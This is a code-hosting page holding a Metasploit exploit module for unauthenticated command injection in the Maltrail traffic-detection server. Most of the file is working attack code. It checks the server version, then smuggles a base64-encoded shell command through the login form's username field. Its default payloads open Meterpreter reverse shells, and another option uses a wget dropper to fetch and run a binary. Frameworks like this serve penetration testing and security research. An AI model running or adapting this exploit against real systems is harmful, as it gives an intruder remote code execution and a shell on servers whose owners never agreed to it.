Path: blob/master/modules/exploits/unix/http/maltrail_rce.rb
23580 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::CmdStager10prepend Msf::Exploit::Remote::AutoCheck1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Maltrail Unauthenticated Command Injection',17'Description' => %q{18Maltrail is a malicious traffic detection system, utilizing publicly19available blacklists containing malicious and/or generally suspicious trails.20The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.21The `subprocess.check_output` function in `mailtrail/core/httpd.py` contains22a command injection vulnerability in the `params.get("username")` parameter.23An attacker can exploit this vulnerability by injecting arbitrary OS commands24into the username parameter. The injected commands will be executed with the25privileges of the running process. This vulnerability can be exploited remotely26without authentication.2728Successfully tested against Maltrail versions 0.52 and 0.53.29},30'License' => MSF_LICENSE,31'Author' => [32'Ege BALCI <egebalci[at]pm.me>', # msf module33'Valentin Lobstein', # Add CVE reference + rewrite34'Chris Wild', # original PoC, analysis35],36'References' => [37['CVE', '2025-34073'],38['EDB', '51676'],39['CVE', '2025-34073'],40['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'],41['URL', 'https://github.com/stamparm/maltrail/issues/19146']42],43'Platform' => %w[unix linux],44'Privileged' => false,45'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],46'Targets' => [47[48'Unix Command',49{50'Platform' => 'unix',51'Arch' => ARCH_CMD,52'Type' => :unix_cmd,53'DefaultOptions' => {54'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'55}56}57],58[59'Linux Dropper',60{61'Platform' => 'linux',62'Arch' => [ARCH_X86, ARCH_X64],63'Type' => :linux_dropper,64'CmdStagerFlavor' => :wget,65'DefaultOptions' => {66'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'67}68}69]70],71'DisclosureDate' => '2023-07-31',72'DefaultTarget' => 0,73'Notes' => {74'Stability' => [CRASH_SAFE],75'Reliability' => [REPEATABLE_SESSION],76'SideEffects' => []77}78)79)80register_options(81[82Opt::RPORT(8338),83OptString.new('TARGETURI', [ true, 'The URI of the Maltrail server', '/'])84]85)86end8788def check89res = send_request_cgi(90'uri' => normalize_uri(target_uri.path),91'method' => 'GET'92)93return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?94return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 2009596version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{\(v<b>([0-9.]+)</b>\)}9798if version < Rex::Version.new('0.54')99return CheckCode::Appears("Version Detected: #{version}")100end101102CheckCode::Safe("Version Detected: #{version}")103end104105def execute_command(cmd, _opts = {})106send_request_cgi(107'uri' => normalize_uri(target_uri.path, 'login'),108'method' => 'POST',109'uri_encode_mode' => 'none',110'headers' => {111'ctype' => 'application/x-www-form-urlencoded'112},113'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh;#`"114)115end116117def exploit118case target['Type']119when :unix_cmd120print_status("Executing #{target.name}...")121execute_command(payload.encoded)122when :linux_dropper123print_status("Executing #{target.name}...")124execute_cmdstager125end126end127end128129130